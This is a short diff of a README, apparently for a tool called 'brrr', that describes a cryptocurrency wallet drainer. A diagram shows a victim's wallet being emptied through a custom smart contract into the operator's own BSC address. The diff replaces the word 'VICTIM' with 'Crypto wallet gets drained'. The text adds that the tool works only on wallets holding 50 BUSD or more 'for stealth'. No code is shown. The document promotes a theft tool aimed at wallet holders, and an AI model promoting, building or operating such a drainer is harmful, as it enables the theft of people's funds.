xxxKEKxxx/brrr/README.md

 HOW IT WORKS

-VICTIM ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS
+Crypto wallet gets drained ----> CUSTOM SMART CONTRACT -----> YOUR BSC ADDRESS

 !!!!!!!!!
 This only will work with wallets that have 50 busd or more for stealth !!!!!!!!!